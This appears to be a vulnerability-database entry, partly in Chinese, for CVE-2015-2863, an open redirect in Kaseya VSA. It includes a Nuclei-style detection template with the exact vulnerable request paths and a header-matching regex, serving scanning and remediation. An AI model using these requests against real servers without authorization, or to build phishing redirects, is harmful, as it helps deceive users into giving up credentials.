CVE-2015-2863: Kaseya Virtual System Administrator - Open Redirect

日期: 2025-08-01 | 影响软件: Kaseya Virtual System Administrator | POC: 已公开

漏洞描述

Kaseya Virtual System Administrator 7.x before 7.0.0.29, 8.x before 8.0.0.18, 9.0 before 9.0.0.14, and 9.1 before 9.1.0.4 are susceptible to an open redirect vulnerability. An attacker can redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.

PoC代码[已公开]

id: CVE-2015-2863

info:
  name: Kaseya Virtual System Administrator - Open Redirect
  author: 0x_Akoko,AmirHossein Raeisi
  severity: medium
  description: |
    Kaseya Virtual System Administrator 7.x before 7.0.0.29, 8.x before 8.0.0.18, 9.0 before 9.0.0.14, and 9.1 before 9.1.0.4 are susceptible to an open redirect vulnerability. An attacker can redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.
  impact: |
    Attackers can redirect users to malicious sites, facilitating phishing attacks and potential credential theft.
  remediation: |
    Update to version 7.0.0.29, 8.0.0.18, 9.0.0.14, or 9.1.0.4 or later.
  reference:
    - https://github.com/pedrib/PoC/blob/3f927b957b86a91ce65b017c4b9c93d05e241592/advisories/Kaseya/kaseya-vsa-vuln.txt
    - http://www.kb.cert.org/vuls/id/919604
    - https://nvd.nist.gov/vuln/detail/CVE-2015-2863
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
    cvss-score: 4.3
    cve-id: CVE-2015-2863
    cwe-id: CWE-601
    epss-score: 0.46464
    epss-percentile: 0.97557
    cpe: cpe:2.3:a:kaseya:virtual_system_administrator:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: kaseya
    product: virtual_system_administrator
  tags: cve2015,cve,redirect,kaseya,vkev,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/inc/supportLoad.asp?urlToLoad=http://oast.me'
      - '{{BaseURL}}/vsaPres/Web20/core/LocalProxy.ashx?url=http://oast.me'

    stop-at-first-match: true
    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)oast\.me\/?(\/|[^.].*)?$' # https://regex101.com/r/idfD2e/1
# digest: 490a004630440220411f0d821f31469322e871e3127dfb4fcc49f155a6c2e8f5b033e6334d3b2a2002200c2e79d277e52db497d1d2e2a82e5b1abc40f6c919e6d8df46ebc7079d50d110:922c64590222798bb761d5b6d8e72950

相关漏洞推荐